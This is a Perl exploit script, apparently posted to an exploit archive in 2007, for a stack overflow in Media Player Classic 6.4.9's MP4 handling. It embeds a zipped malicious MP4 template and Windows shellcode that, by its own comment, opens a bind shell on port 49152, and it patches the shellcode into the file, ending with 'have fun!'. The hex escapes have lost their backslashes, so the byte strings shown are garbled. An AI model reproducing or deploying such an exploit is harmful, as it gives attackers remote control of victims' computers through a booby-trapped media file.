mpc-overflow.txt
Posted on 09 December 2007
#!/bin/perl # # Media Player Classic 6.4.9 MP4 Stack Overflow # # 0-day discovered and exploited by SYS 49152 # # Tested on win XP SP2 ENG # Shell on port 49152 # # usage: # - download this codec in order to manage MP4 content: # http://www.3ivx.com/coral/3ivx_d4_451_win.exe # # - open the MP4 file with mplayerc.exe # # SYS 49152 # gforce(put the @ here)operamail(put the . here)com # # update: # the latest 5.0.1 codec is still vulnerable use Archive::Zip qw( :ERROR_CODES :CONSTANTS ); $zip_data = # code 724981 "x50x4Bx03x04x14x00x00x00x08x00xB3xB1x30x36xF3". "x13xD9x53x73x02x00x00x57x04x00x00x19x00x00x00". "x53x59x53x5Fx34x39x31x35x32x5Fx4Dx50x34x5Fx66". "x6Fx72x5Fx4Dx50x43x2Ex6Dx70x34x63x60x60xBFx9C". "x9Bx9Fx5FxC6xC0xC0x90x93x5Bx96x91x02xA4x19x0E". "xBCxF1x2Bx3BxF0x26x2Cx99x81x81xF9x05x88xCFxC0". "x08x46x08x80xC2xC1xE4x3Bx30xE0x05x40xD5xECxF1". "xA5x29x25x89x40x3Ax3Cx37x15x44x83x81x62x46x4A". "x4Ex11x4Cx51x6Ex4Ax66x51x62x41x41x0Ex92x3Ex76". "xADxCCx9CxE2x12x20x43x62x65x5Ex62x2Ex90x16x48". "x49x04x6Bx86x59x2FxB1xB2xBCxA8x04xABxB8x63x50". "x08x56xF1xC4x9Cx24x4Cx71x36xF3x95xC9xB9x40x73". "x98x6Fx21x8Bx4Fx40x02xACx4Cx8CxBExBAx8Cx8CxBE". "x0ExBEx0Dx37x80x04x90x62x85x50x8Cx10xCAx01x42". "x75x41xA8x06x08x55x0AxA1x58x20x14x37x84xFAxE4". "xFBx9Ax0CxD0x9Dx16xEExE0xCCxF1xB3xA4xE3xF5x84". "x41x03x5ExBFx16xCDx99xE0x3AxD1x97x95x05x12x36". "x01xBEx87x83x23x83x4Dx2Cx0Dx4Dx8Dx14x82x42x7D". "x5CxA3x14x8Dx4Fx36xBFxDCx70xF3xDDxCDx12x95x2F". "xD1x8DxC5xC2x2Bx5CxBFxEEx68x7ExFDxE7xD1x97x10". "x7DxB9xAFx0Ex7BxB8xDCxC3x55xEBxAExF4x24xD6xFD". "x9Dx72xAEx73xEFx05x17x29xE3xE7xB1x75xCFx3Bx5C". "xE4x3Ex2Ax17xD6xEDx74x2Bx31x55x64x39x68x7Ax66". "x7Dx8BxFDxD6x95xEDx72x3Ex93x05x2Fx4ExB8xBBxA0". "xEEx79x8Fx8BxDCx3Dx65xCFx7DxC6xDFx23xBFx04xAF". "xCExACx33x3Cx92xF8xF2x66x76x89xDEx1Dx65xB6xA3". "xC6x2Fx3CxEBx4Ex6Cx79x51xF7x63x81xF4x5CxB3x67". "xDEx92x2FxC2x27x4Fx7Ex7Dx4ExF7x58xD7x01xA3xB6". "xAExEFx82x5Cx19x07xFAx24x5Cx26x8Bx72xE5x7Dx3F". "x23x70x4Fx73xC5xDFx5Dx7FxF5xBFxBBx57xE8xEAx6C". "x8Cx7DxB1xC8xBDx4Ex6CxD9xEBxDFx62xDBx5ExBFx16". "xE3xCAx38xA7x6BxBAxE3x9Cx58x4DxA4xADx6ExE0xA2". "x1Bx4Dx40x39xFDxA7x2FxFFxEEx52xBDxC0xF3xE2x76". "xE0xFFx5DxCAxAFx41x6Cx5Fx9ExE2x8Fx40xF6x8Bx3F". "x82x0BxDCx2BxAExCDx8DxBFxD8xDCxF3x3Ex7Cx32x90". "xADx3CxFFxCEx39xDDx69x57x15x17xCCx7FxF1x31xC7". "xD2xD0x5Fx7FxA3xA1x57x89xA9x37xD3xEExEDx53xC3". "xD8x6Fx6AxABxDAx9Fx15x66x7Ex37xF7x54xD8xB7xC7". "xEEx77x19xB9xF2x3Ex0Bx2Dx7FxF9x53x64xFExCEx9F". "x22x0Bx5Ex86x4Fx9Dx2Bx5AxE8x60xFDx3Ax7CxF2x7C". "xF7xF0x22xAEx0Cx65x21x4ExEBx1Cx45xAExBCx5Fx40". "xFBxDCxBBx45x6FxFCxDExA5xECx5Ex01x0CxC4x52x70". "x52x4Ex4FxCDxC3x92xC4x15x4Ax8AxB2x41xE2x12x50". "x71x74xA0x90x92x59x9Cx8Dx47x5ExAAx24xB7x20x1F". "x48x0Bx41xE5x45xE1x32x92xC9x05x99xA0xDCx29x88". "x2ExC3x91x0Bx14x01x00x50x4Bx01x02x14x00x14x00". "x00x00x08x00xB3xB1x30x36xF3x13xD9x53x73x02x00". "x00x57x04x00x00x19x00x00x00x00x00x00x00x00x00". "x20x00x00x00x00x00x00x00x53x59x53x5Fx34x39x31". "x35x32x5Fx4Dx50x34x5Fx66x6Fx72x5Fx4Dx50x43x2E". "x6Dx70x34x50x4Bx05x06x00x00x00x00x01x00x01x00". "x47x00x00x00xAAx02x00x00x00x00"; my $shellcode = # code 724981 "x33xC9x83xE9xB0xD9xEExD9x74x24xF4x5Bx81x73x13". "xA8x45xF5xB8x83xEBxFCxE2xF4x54x2Fx1ExF5x40xBC". "x0Ax47x57x25x7ExD4x8Cx61x7ExFDx94xCEx89xBDxD0". "x44x1Ax33xE7x5Dx7ExE7x88x44x1ExF1x23x71x7ExB9". "x46x74x35x21x04xC1x35xCCxAFx84x3FxB5xA9x87x1E". "x4Cx93x11xD1x90xDDxA0x7ExE7x8Cx44x1ExDEx23x49". "xBEx33xF7x59xF4x53xABx69x7Ex31xC4x61xE9xD9x6B". "x74x2ExDCx23x06xC5x33xE8x49x7ExC8xB4xE8x7ExF8". "xA0x1Bx9Dx36xE6x4Bx19xE8x57x93x93xEBxCEx2DxC6". "x8AxC0x32x86x8AxF7x11x0Ax68xC0x8Ex18x44x93x15". "x0Ax6ExF7xCCx10xDEx29xA8xFDxBAxFDx2FxF7x47x78". "x2Dx2CxB1x5DxE8xA2x47x7Ex16xA6xEBxFBx16xB6xEB". "xEBx16x0Ax68xCEx2Dx35xB8xCEx16x7Cx59x3Dx2Dx51". "xA2xD8x82xA2x47x7Ex2FxE5xE9xFDxBAx25xD0x0CxE8". "xDBx51xFFxBAx23xEBxFDxBAx25xD0x4Dx0Cx73xF1xFF". "xBAx23xE8xFCx11xA0x47x78xD6x9Dx5FxD1x83x8CxEF". "x57x93xA0x47x78x23x9FxDCxCEx2Dx96xD5x21xA0x9F". "xE8xF1x6Cx39x31x4Fx2FxB1x31x4Ax74x35x4Bx02xBB". "xB7x95x56x07xD9x2Bx25x3FxCDx13x03xEEx9DxCAx56". "xF6xE3x47xDDx01x0Ax6ExF3x12xA7xE9xF9x14x9FxB9". "xF9x14xA0xE9x57x95x9Dx15x71x40x3BxEBx57x93x9F". "x47x57x72x0Ax68x23x12x09x3Bx6Cx21x0Ax6ExFAxBA". "x25xD0x47x8Bx15xD8xFBxBAx23x47x78x45xF5xB8"; open(code, ">tempzip.zip") || die "Can't Write temporary File "; binmode (code); print code $zip_data; close (code); print " Temporary file ready, patching.. "; my $zip = Archive::Zip->new(); $zip->read( 'tempzip.zip' ) ; $zip->extractMember( 'SYS_49152_MP4_for_MPC.mp4' ); open(code, "+<SYS_49152_MP4_for_MPC.mp4") || die "Can't Open temporary File "; binmode (code); seek code,619,0; print code $shellcode; close (code); print "Shellcode added, have fun! ";
